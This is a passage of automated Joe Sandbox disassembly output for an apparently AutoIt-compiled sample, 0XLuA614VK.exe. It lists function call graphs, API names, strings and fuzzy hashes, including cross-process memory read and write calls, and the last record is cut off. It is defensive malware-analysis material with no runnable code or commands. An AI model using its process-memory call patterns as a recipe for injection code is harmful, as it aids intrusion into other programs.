                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: 3e6842303f75ab764c22a03d198685a2ea34e2fffeb7db10e111fa855bc51c1d
                                                      • Instruction ID: 13553e8ec5bd50c16e35c798b8744035a98f7f44a17262254ea50f9b9d051276
                                                      • Opcode Fuzzy Hash: 3e6842303f75ab764c22a03d198685a2ea34e2fffeb7db10e111fa855bc51c1d
                                                      • Instruction Fuzzy Hash: 31F06D75200309EBDB216FA9EC89F973BADFF89761F100525FA45D7251CA70D841AFA0
                                                      APIs
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F90324
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F90331
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F9033E
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F9034B
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F90358
                                                      • CloseHandle.KERNEL32(?,?,?,?,00F9017D,?,00F932FC,?,00000001,00F62592,?), ref: 00F90365
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: c9f7adb56772d421d776e82ad800532824b3ff5ac895bd9a30ff5e1f4b06fbe6
                                                      • Instruction ID: 44818f5dfce83d3e7adf38493f2388a5a720beaad9cd25a2584d8c7fe9b8cf95
                                                      • Opcode Fuzzy Hash: c9f7adb56772d421d776e82ad800532824b3ff5ac895bd9a30ff5e1f4b06fbe6
                                                      • Instruction Fuzzy Hash: 8B01AE72800B159FDB30AF66D880812FBF9BF603253158A3FD19652931CBB1A958EF80
                                                      APIs
                                                      • _free.LIBCMT ref: 00F5D752
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F5D764
                                                      • _free.LIBCMT ref: 00F5D776
                                                      • _free.LIBCMT ref: 00F5D788
                                                      • _free.LIBCMT ref: 00F5D79A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: adaf0d269d3810dd23b3cec05819866062062e277abd58ea8403a823ad99cd02
                                                      • Instruction ID: 3bd153d0c09343c57aded1db6267336194637d3354adea37ccc882ef3ca36ccf
                                                      • Opcode Fuzzy Hash: adaf0d269d3810dd23b3cec05819866062062e277abd58ea8403a823ad99cd02
                                                      • Instruction Fuzzy Hash: 82F09C3290124CAB8675EB58FDC1C5A7BEDBB493227940C05FE44E7502C734FC84B6A0
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00F85C58
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F85C6F
                                                      • MessageBeep.USER32(00000000), ref: 00F85C87
                                                      • KillTimer.USER32(?,0000040A), ref: 00F85CA3
                                                      • EndDialog.USER32(?,00000001), ref: 00F85CBD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: 6721d525c31a85c25ed08c690acd215760668b67f5c576e7b309aa3a07d0a628
                                                      • Instruction ID: 27bd008debc1fd2d6b7cb4601b69fe4e587394b55137af1b5663964477e2afb5
                                                      • Opcode Fuzzy Hash: 6721d525c31a85c25ed08c690acd215760668b67f5c576e7b309aa3a07d0a628
                                                      • Instruction Fuzzy Hash: A4018B705007049BEB216B20DD8EFE677B9BB01F05F001659A587A14E1DBF45944AF90
                                                      APIs
                                                      • _free.LIBCMT ref: 00F522BE
                                                        • Part of subcall function 00F529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000), ref: 00F529DE
                                                        • Part of subcall function 00F529C8: GetLastError.KERNEL32(00000000,?,00F5D7D1,00000000,00000000,00000000,00000000,?,00F5D7F8,00000000,00000007,00000000,?,00F5DBF5,00000000,00000000), ref: 00F529F0
                                                      • _free.LIBCMT ref: 00F522D0
                                                      • _free.LIBCMT ref: 00F522E3
                                                      • _free.LIBCMT ref: 00F522F4
                                                      • _free.LIBCMT ref: 00F52305
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 64fef65f50a6c4f59dcc51946c5ff3abe7590c0d586ffff2db9eacc4d8dcefba
                                                      • Instruction ID: cecc65eef3f0bca74eb32774dab1e1ee1c76922b0ba55132db75c280e6e51045
                                                      • Opcode Fuzzy Hash: 64fef65f50a6c4f59dcc51946c5ff3abe7590c0d586ffff2db9eacc4d8dcefba
                                                      • Instruction Fuzzy Hash: 3DF054748001189B8652AF9CBC418693B78FF19762B00070AF910E63B2CB350516FFE4
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 00F395D4
                                                      • StrokeAndFillPath.GDI32(?,?,00F771F7,00000000,?,?,?), ref: 00F395F0
                                                      • SelectObject.GDI32(?,00000000), ref: 00F39603
                                                      • DeleteObject.GDI32 ref: 00F39616
                                                      • StrokePath.GDI32(?), ref: 00F39631
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: e593eda1367142d02538f0983134ae7f11d7f181a234083ea349578013b8fe7d
                                                      • Instruction ID: e2c178f418655d677b1194d61b8c83fceb9985cdb4e007d2ada9f2a7a6605503
                                                      • Opcode Fuzzy Hash: e593eda1367142d02538f0983134ae7f11d7f181a234083ea349578013b8fe7d
                                                      • Instruction Fuzzy Hash: 3FF0F63140A20CEBDB226F69ED5877A3B69BF10372F048214E565950F0CBF08995FFA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: __freea$_free
                                                      • String ID: a/p$am/pm
                                                      • API String ID: 3432400110-3206640213
                                                      • Opcode ID: 971ec30d16c27e6898e6ae6367c58ae54cee3c9265ebbc24fe85226c3d226cbc
                                                      • Instruction ID: 47a0c3d582c13332da0a3a5a3dc00f48007af0333cec012988a7e7a8b2cc0b04
                                                      • Opcode Fuzzy Hash: 971ec30d16c27e6898e6ae6367c58ae54cee3c9265ebbc24fe85226c3d226cbc
                                                      • Instruction Fuzzy Hash: 3AD10532D00206DADB249F68C865BFAB7B4FF06722F140159EF019BA51D375BD88EB91
                                                      APIs
                                                        • Part of subcall function 00F40242: EnterCriticalSection.KERNEL32(00FF070C,00FF1884,?,?,00F3198B,00FF2518,?,?,?,00F212F9,00000000), ref: 00F4024D
                                                        • Part of subcall function 00F40242: LeaveCriticalSection.KERNEL32(00FF070C,?,00F3198B,00FF2518,?,?,?,00F212F9,00000000), ref: 00F4028A
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                        • Part of subcall function 00F400A3: __onexit.LIBCMT ref: 00F400A9
                                                      • __Init_thread_footer.LIBCMT ref: 00FA7BFB
                                                        • Part of subcall function 00F401F8: EnterCriticalSection.KERNEL32(00FF070C,?,?,00F38747,00FF2514), ref: 00F40202
                                                        • Part of subcall function 00F401F8: LeaveCriticalSection.KERNEL32(00FF070C,?,00F38747,00FF2514), ref: 00F40235
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                      • String ID: 5$G$Variable must be of type 'Object'.
                                                      • API String ID: 535116098-3733170431
                                                      • Opcode ID: 5d41dc07a6ab18535b47dd244f6f4752abe41968d94a009452c7df4f2f850831
                                                      • Instruction ID: 716cbaff09e90b1bf95c5c33c9f2a8937432a779966992a204b619762e1ba530
                                                      • Opcode Fuzzy Hash: 5d41dc07a6ab18535b47dd244f6f4752abe41968d94a009452c7df4f2f850831
                                                      • Instruction Fuzzy Hash: F3919CB5A04209EFCB04EF54DC90DBDB7B1BF4A310F148059F8069B2A2DB75AE45EB61
                                                      APIs
                                                        • Part of subcall function 00F8B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F821D0,?,?,00000034,00000800,?,00000034), ref: 00F8B42D
                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F82760
                                                        • Part of subcall function 00F8B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F821FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00F8B3F8
                                                        • Part of subcall function 00F8B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00F8B355
                                                        • Part of subcall function 00F8B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F82194,00000034,?,?,00001004,00000000,00000000), ref: 00F8B365
                                                        • Part of subcall function 00F8B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F82194,00000034,?,?,00001004,00000000,00000000), ref: 00F8B37B
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F827CD
                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F8281A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                      • String ID: @
                                                      • API String ID: 4150878124-2766056989
                                                      • Opcode ID: 5bb41147867b875dd3121623eec1eeb2720394277af8ff18388fe975d7a75f9b
                                                      • Instruction ID: c4e3b2c323673c00e176b0e830fbaad1fd39fd192c1129ae56e47b034c750646
                                                      • Opcode Fuzzy Hash: 5bb41147867b875dd3121623eec1eeb2720394277af8ff18388fe975d7a75f9b
                                                      • Instruction Fuzzy Hash: CE411B72900218BFDB10EFA4CD86AEEBBB8AF09710F104095FA55B7181DB746E45DBA1
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\0XLuA614VK.exe,00000104), ref: 00F51769
                                                      • _free.LIBCMT ref: 00F51834
                                                      • _free.LIBCMT ref: 00F5183E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\0XLuA614VK.exe
                                                      • API String ID: 2506810119-3877578700
                                                      • Opcode ID: d6a48543c14dac173110df1f9066290c5985cdee8ece6d45adbf2132228e045e
                                                      • Instruction ID: 3acfc6809e5d5a06a81c76d12cf64c3a6108b2b6a2eb41b2daf9c38bdbce3360
                                                      • Opcode Fuzzy Hash: d6a48543c14dac173110df1f9066290c5985cdee8ece6d45adbf2132228e045e
                                                      • Instruction Fuzzy Hash: A7318375E00218EBDB21DB999C81E9EBBBCFF85312B144166FE0497211D6705E48EB90
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F8C306
                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00F8C34C
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FF1990,012055A8), ref: 00F8C395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem
                                                      • String ID: 0
                                                      • API String ID: 135850232-4108050209
                                                      • Opcode ID: 5cd070b2388465bda70747879e1bac90d7bacc0d6802d51126f81fb60310ccc9
                                                      • Instruction ID: c0c960f5ed6410c2ebb27634a632ccd80456b2dbf3b2ec5df98be91b6a877133
                                                      • Opcode Fuzzy Hash: 5cd070b2388465bda70747879e1bac90d7bacc0d6802d51126f81fb60310ccc9
                                                      • Instruction Fuzzy Hash: 1C41A3316043019FD720EF25DC84B9ABBE8EF85320F14862DF9A5972D1D774E905EBA2
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FBCC08,00000000,?,?,?,?), ref: 00FB44AA
                                                      • GetWindowLongW.USER32 ref: 00FB44C7
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FB44D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 15cfc3bef67ab9110431c64e1f243317e1ba7781361a752b6e19cd845a71f562
                                                      • Instruction ID: 35943266359bd376d457efbd25a314707ab207b6de76de1732ccc5553d046388
                                                      • Opcode Fuzzy Hash: 15cfc3bef67ab9110431c64e1f243317e1ba7781361a752b6e19cd845a71f562
                                                      • Instruction Fuzzy Hash: BB31CD31610605AFDB209E39DC45BEA7BA9EB08334F244315F979921E1D774EC60AB60
                                                      APIs
                                                        • Part of subcall function 00FA335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00FA3077,?,?), ref: 00FA3378
                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FA307A
                                                      • _wcslen.LIBCMT ref: 00FA309B
                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00FA3106
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                      • String ID: 255.255.255.255
                                                      • API String ID: 946324512-2422070025
                                                      • Opcode ID: 40321586aba28bb319b6ba0ff09c95a8b9b2ca9a0ef51ef0a65bd4677d0482cf
                                                      • Instruction ID: f779034a862e504fdd3a191d71aa5cdae3e9133c27a0d29d1bb9d050efca31ec
                                                      • Opcode Fuzzy Hash: 40321586aba28bb319b6ba0ff09c95a8b9b2ca9a0ef51ef0a65bd4677d0482cf
                                                      • Instruction Fuzzy Hash: 1231E7B5A042059FCB10CF68C885EAA77E0EF16328F24C059F8158B392DB75EE41EB60
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FB4705
                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FB4713
                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FB471A
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 4014797782-2298589950
                                                      • Opcode ID: c552752a9b00b73abc246afd880e0eaf2573d0f3ec65eea4df4399183167949a
                                                      • Instruction ID: 97271e42ae707545c2064af4a4f61e9b8d3046b1ac93d57e201f8af642882c30
                                                      • Opcode Fuzzy Hash: c552752a9b00b73abc246afd880e0eaf2573d0f3ec65eea4df4399183167949a
                                                      • Instruction Fuzzy Hash: C9211BB5600209AFEB10DF65DC81DB737ADEB5A3A4B140159FA049B251CB75FC11EEA0
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                      • API String ID: 176396367-2734436370
                                                      • Opcode ID: 12daf492f6001704fcad816b1efe2d25ff5ee68ad4ab4f2ef7372b97cc06b672
                                                      • Instruction ID: 0e5635c72140238218abd99fed8bb2e6cbb24d6ded777222f0e2ba83bface8be
                                                      • Opcode Fuzzy Hash: 12daf492f6001704fcad816b1efe2d25ff5ee68ad4ab4f2ef7372b97cc06b672
                                                      • Instruction Fuzzy Hash: 40213532608621A6C331BA25DC02FFB77D89F91320F1C4026F9499B181FBD9AD46F395
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FB3840
                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FB3850
                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FB3876
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$MoveWindow
                                                      • String ID: Listbox
                                                      • API String ID: 3315199576-2633736733
                                                      • Opcode ID: 4cfb3a033e8204cc54957b8e0f11900b39ea1ca567814582706b290cf77fa527
                                                      • Instruction ID: b0ad2a86c373c6ae5f94fd2ed1abbc7c3a9ec3a2a2f138fa0f1cd59739dad6a0
                                                      • Opcode Fuzzy Hash: 4cfb3a033e8204cc54957b8e0f11900b39ea1ca567814582706b290cf77fa527
                                                      • Instruction Fuzzy Hash: 8421D072A40218BBEB219F56CC84FFB376EEF89760F108114F9009B190CA71DC12ABE0
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F94A08
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F94A5C
                                                      • SetErrorMode.KERNEL32(00000000,?,?,00FBCC08), ref: 00F94AD0
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: %lu
                                                      • API String ID: 2507767853-685833217
                                                      • Opcode ID: 740a7ba02e1aecdc5c03cbeeb1f5ae157a932b0992814aac4fbd59afa7eb5aad
                                                      • Instruction ID: 71f8ef3c94426e633365518f1ff9a55834aa32575db7e8ccfeb307cb3ebd3646
                                                      • Opcode Fuzzy Hash: 740a7ba02e1aecdc5c03cbeeb1f5ae157a932b0992814aac4fbd59afa7eb5aad
                                                      • Instruction Fuzzy Hash: B1317171A00109AFDB10DF54C885EAABBF8EF48318F1480A5F909EB252D775ED46DBA1
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FB424F
                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FB4264
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FB4271
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: 98e9e1a687c6006f2e683c0d7ae705ded63f02c77f53593f0ac29859da95814b
                                                      • Instruction ID: 4949602afcb84ee9a9a26b25ac2af4ba637dbc4bcda2f755af94a881cd43eced
                                                      • Opcode Fuzzy Hash: 98e9e1a687c6006f2e683c0d7ae705ded63f02c77f53593f0ac29859da95814b
                                                      • Instruction Fuzzy Hash: D011E331640248BEEF209E2ACC06FEB3BACEF95B64F010114FA55E20A1D271EC11FB50
                                                      APIs
                                                        • Part of subcall function 00F26B57: _wcslen.LIBCMT ref: 00F26B6A
                                                        • Part of subcall function 00F82DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F82DC5
                                                        • Part of subcall function 00F82DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F82DD6
                                                        • Part of subcall function 00F82DA7: GetCurrentThreadId.KERNEL32 ref: 00F82DDD
                                                        • Part of subcall function 00F82DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F82DE4
                                                      • GetFocus.USER32 ref: 00F82F78
                                                        • Part of subcall function 00F82DEE: GetParent.USER32(00000000), ref: 00F82DF9
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00F82FC3
                                                      • EnumChildWindows.USER32(?,00F8303B), ref: 00F82FEB
                                                      Strings
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                      • String ID: %s%d
                                                      • API String ID: 1272988791-1110647743
                                                      • Opcode ID: 2d47457495f1445f25eb7ebaba668179780e44ac8fac2688904593ba1f7f4b1d
                                                      • Instruction ID: 2da5199a4f39214159769a933479f76e2a015ad0af88d1c81afceaf16e5b747f
